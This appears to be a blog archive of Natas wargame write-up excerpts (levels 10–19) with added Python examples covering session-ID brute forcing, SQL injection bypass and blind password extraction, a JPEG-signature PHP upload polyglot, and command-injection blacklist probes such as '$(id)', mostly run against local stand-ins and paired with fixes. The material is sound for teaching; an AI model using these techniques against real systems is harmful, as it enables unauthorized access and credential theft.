Month: January 2015

Natas Level 19

This is a really fabulous hint. We know we'll have to brute force the session ID again, and we also know the pattern is not sequential as it was in the previous level, so let's start by looking at some sample session IDs: Hmmm, all the session IDs consist of the letters a-f and digits

Read More »

Natas Level 18

No matter who you log in as, it says "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19". We need to get the session where $_SESSION['admin'] == 1, but how do we know which PHPSESSID is associated with this? Well, earlier in

Read More »
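A sequential session brute force of the kind this level calls for, as an added example (not the post's own script). The detection rule, a response that lacks the "regular user" message, comes from the write-up; the upper bound of 1000, the hidden admin ID of 247 and the endpoint shape in the HTTP probe are constructed stand-ins so the example runs offline. The candidate generator is the only piece that would change for a level whose IDs are not sequential.

```python
"""Brute force a sequential PHPSESSID until the admin session turns up."""
import base64
import urllib.request
from typing import Callable, Iterable, Optional

# The message the page shows for every non-admin session (from the write-up).
REGULAR_USER_MSG = "You are logged in as a regular user"


def sequential_ids(start: int, stop: int) -> Iterable[str]:
    """Candidate session IDs for a server that hands them out sequentially."""
    return (str(i) for i in range(start, stop + 1))


def find_admin_session(candidates: Iterable[str],
                       probe: Callable[[str], str]) -> Optional[str]:
    """Return the first session ID whose page lacks the regular-user marker.

    `probe` fetches the page body for a given PHPSESSID. Swapping in a
    different candidate generator is all that changes for a scheme whose
    IDs are not sequential.
    """
    for sid in candidates:
        if REGULAR_USER_MSG not in probe(sid):
            return sid
    return None


def make_http_probe(url: str, username: str, password: str) -> Callable[[str], str]:
    """Real probe: HTTP Basic auth for the level plus a PHPSESSID cookie.

    Assumed endpoint shape; it is defined but not called here so the
    example stays offline.
    """
    token = base64.b64encode(f"{username}:{password}".encode()).decode()

    def probe(sid: str) -> str:
        req = urllib.request.Request(url, headers={
            "Authorization": f"Basic {token}",
            "Cookie": f"PHPSESSID={sid}",
        })
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    return probe


# Constructed stand-in for the server: session 247 is the admin one.
ADMIN_SID = "247"


def fake_probe(sid: str) -> str:
    if sid == ADMIN_SID:
        return "<p>You are an admin. The credentials for the next level are here.</p>"
    return (f"<p>{REGULAR_USER_MSG}. Login as an admin to retrieve "
            "credentials for natas19</p>")


if __name__ == "__main__":
    hit = find_admin_session(sequential_ids(1, 1000), fake_probe)
    print("admin session id:", hit)
```

The login form itself never enters into it: the only thing that varies between requests is the PHPSESSID cookie, so the real probe sends nothing else. Against a live target, add a delay or a small thread pool and treat a timeout as "retry this ID", not as "not admin".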

Natas Level 17

Our username check is back, and this time it's not telling us anything: It looks like they forgot to uncomment all the messages before they published this file. That's OK, we can take the same strategy as the other blind SQL level, and use an if statement combined with the

Read More »

Natas Level 16

Looks like our old friend is back, and this time they are filtering MORE STUFF OMG!!! TOO BAD IT'S STILL NOT ENOUGH FTW!!! You can see they are filtering the following characters: ; | & ` \ ' " On top of that they put our input inside of double

Read More »

Natas Level 15

We have a box here we can use to check whether a username exists or not. I started out trying some regular inputs like this: Then I tried something more devious, a single quotation mark: We get an error message, but it's not as specific as the last level. This

Read More »

Natas Level 14

Just a plain-looking login page, let's jump to the source code: So $query is being initialized with unsanitized user input via $_REQUEST["username"] and $_REQUEST["password"]. I wonder what would happen if we put a quotation mark (") in either field? Let's try it, and we'll also include "?debug=1" in the URL because

Read More »
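The two SQL injection shapes that the level 14, 15 and 17 write-ups turn on, as one added example that is not the post's own code: a login query built by string concatenation beside its parameterized fix, and the blind yes/no extraction loop that the level 15 and 17 entries rely on. The table, the one row in it, the query text and the response strings are constructed stand-ins, since the excerpts don't show the level's SQL. The example uses single-quoted literals so that the stray quote the level 15 entry tries produces the syntax error it describes; for a query that uses double quotes, as the level 14 test suggests, the same payloads apply with the quote character swapped.

```python
"""Concatenated SQL versus bound parameters, and blind yes/no extraction."""
import sqlite3
import string
from typing import Callable, Optional

# Constructed stand-in for the level's database: one user, one password.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (username TEXT, password TEXT)")
CONN.execute("INSERT INTO users VALUES ('natas16', 's3cretPW')")


def login_vulnerable(username: str, password: str) -> Optional[str]:
    """Level 14 shape: both fields concatenated into the query unsanitized.
    Returns the matched username, None for no match, 'error' if the query
    no longer parses (what a stray quote does)."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    try:
        row = CONN.execute(query).fetchone()
    except sqlite3.Error:
        return "error"
    return row[0] if row else None


def login_safe(username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: quotes in the input stay data."""
    row = CONN.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


def user_exists(username: str) -> str:
    """Level 15 shape: an existence check that leaks one bit per request."""
    query = f"SELECT 1 FROM users WHERE username='{username}'"
    try:
        found = CONN.execute(query).fetchone() is not None
    except sqlite3.Error:
        return "Error in query."
    return "This user exists." if found else "This user doesn't exist."


def existence_oracle(username: str, condition: str) -> bool:
    """True iff `condition` holds for that user's row, judged from the
    message. Level 17 runs the same loop with an oracle that reads a
    different side channel; only this function would change."""
    payload = f"{username}' AND ({condition}) AND '1'='1"
    return user_exists(payload) == "This user exists."


def extract_password(username: str,
                     oracle: Callable[[str, str], bool],
                     alphabet: str = string.ascii_letters + string.digits,
                     max_len: int = 64) -> str:
    """Recover the password one character at a time with yes/no questions."""
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            # sqlite compares strings case-sensitively by default; on MySQL a
            # case-insensitive collation would need BINARY around the column,
            # or the loop silently merges 'a' and 'A'.
            if oracle(username, f"SUBSTR(password,{len(found) + 1},1)='{ch}'"):
                found += ch
                break
        else:
            break  # no character matched: we ran off the end of the string
    return found


if __name__ == "__main__":
    print("stray quote:", login_vulnerable("natas16", "'"))
    print("bypass:", login_vulnerable("", "' OR '1'='1"))
    print("safe:", login_safe("", "' OR '1'='1"))
    print("extracted:", extract_password("natas16", existence_oracle))
```

Each extracted character costs at most one request per alphabet symbol; a real run would narrow that with a binary search over character codes, and would widen the alphabet to include punctuation before trusting that an empty match means the end of the string.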

Natas Level 13

This is just like level 12 except this time they claim they are checking that the uploaded files are actually images. If we peek at the source we can see they are using the function exif_imagetype() to do the check. Here's the code snippet: According to php.net "exif_imagetype() reads the

Read More »

Natas Level 12

We actually don't even need to look at the source code to beat this level. They are allowing us to upload a JPEG up to 1KB in size. I'm willing to bet that they don't even check to see if we really are uploading a JPEG. If I'm right we

Read More »
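How a first-bytes check of the kind exif_imagetype() performs behaves against a file that is only an image for its first few bytes, as an added example (not the post's code and not PHP's implementation). The JPEG, PNG and GIF signatures are the real ones; the `require_signature` switch stands in for the difference between level 12 (no check at all) and level 13 (signature check), the 1KB limit is the one the level 12 entry mentions, and the storage-name helper is an assumed hardening step, not something either level does.

```python
"""Magic-number image check beside a payload that satisfies it."""
import secrets
from typing import Optional

# Leading bytes of the three formats (real signatures for each file format).
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def detect_image_type(data: bytes) -> Optional[str]:
    """Classify by signature only, the way exif_imagetype() does: nothing
    after the leading bytes is examined."""
    for kind, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return None


def accept_upload(data: bytes, require_signature: bool) -> bool:
    """Level 12 shape when require_signature is False (any bytes go through);
    level 13 shape when True (the bytes must start with an image signature)."""
    if len(data) > 1024:          # the 1KB limit the level 12 entry mentions
        return False
    if not require_signature:
        return True
    return detect_image_type(data) is not None


def storage_name(client_filename: str) -> str:
    """Assumed hardening, not the level's behaviour: ignore the client's name
    and extension entirely and store under a random name with a fixed
    extension that the web server will never hand to an interpreter."""
    return secrets.token_hex(16) + ".jpg"


# Constructed samples: a JPEG signature followed by non-image content, and
# the same content without the signature.
POLYGLOT = b"\xff\xd8\xff" + b"<?php echo 'not an image'; ?>"
PLAIN_SCRIPT = b"<?php echo 'not an image'; ?>"


if __name__ == "__main__":
    print("polyglot classified as:", detect_image_type(POLYGLOT))
    print("script classified as:", detect_image_type(PLAIN_SCRIPT))
    print("stored as:", storage_name("anything.php"))
```

The signature check answers "what do the first bytes look like", not "is this file safe to execute", so it cannot be the control that keeps uploads from running. What decides whether a polyglot matters is the name and location the server stores it under; once the extension and directory are fixed by the server rather than the client, the three leading bytes are irrelevant.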

Natas Level 11

This level has some meat to it so let's jump right to the source code: We'll follow the flow of execution and take it (almost) line by line. This creates an array called $defaultdata with two keys, "showpassword" and "bgcolor", with values set to "no" and "#ffffff" respectively. This sets

Read More »

Natas Level 10

This level is almost identical to the previous one, except for some minor input sanitization. The script is now checking for the existence of three characters, ";", "|", and "&", in the user input. If they are found we receive an error message. See for yourself: The great thing about this

Read More »
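The character blacklists the level 10 and level 16 entries describe, checked against a few inputs, beside the argv-list construction that makes such a blacklist unnecessary; an added example, not the post's code. The blacklists are the ones the two write-ups list; the `grep` over a word list is an assumption about the command behind the form (the excerpts don't show it), and the three probe inputs are constructed.

```python
"""Character blacklists from the two levels beside an argv-based alternative."""
from typing import Iterable, List

# The characters each level's script rejects (from the write-ups).
LEVEL10_BLACKLIST = frozenset(";|&")
LEVEL16_BLACKLIST = frozenset(";|&`\\'\"")


def is_rejected(user_input: str, blacklist: Iterable[str]) -> bool:
    """The page's check: refuse the input if any blacklisted character appears."""
    return any(ch in blacklist for ch in user_input)


def shell_command(user_input: str, double_quoted: bool) -> str:
    """The command string as the shell would receive it (assumed grep over a
    word list). Level 16 additionally wraps the input in double quotes, which
    stops word splitting but not $(...) substitution."""
    inner = f'"{user_input}"' if double_quoted else user_input
    return f"grep -i {inner} dictionary.txt"


def safe_argv(user_input: str) -> List[str]:
    """Alternative to a blacklist: no shell at all. Handed to subprocess.run()
    as a list, the input is exactly one argument, and '--' stops grep from
    reading a leading '-' as an option."""
    return ["grep", "-i", "--", user_input, "dictionary.txt"]


# Constructed probes: a command separator, command substitution, and an
# input that looks like an option plus a path.
PROBES = {
    "separator": "foo; id",
    "substitution": "$(id)",
    "option": "-r /",
}


def survivors(blacklist: Iterable[str]) -> List[str]:
    """Names of the probes a given blacklist lets through."""
    return [name for name, text in PROBES.items()
            if not is_rejected(text, blacklist)]


if __name__ == "__main__":
    for label, bl in (("level 10", LEVEL10_BLACKLIST), ("level 16", LEVEL16_BLACKLIST)):
        print(label, "lets through:", survivors(bl))
    print(shell_command("$(id)", double_quoted=True))
    print(safe_argv("-r /"))
```

Neither list contains `$`, `(` or `)`, and a double-quoted string is still subject to command substitution, so the wrapping the level 16 entry mentions changes nothing for that construct. The argv list removes the shell from the picture entirely; the `--` covers the separate problem of the input being parsed as an option, which no character blacklist addresses either.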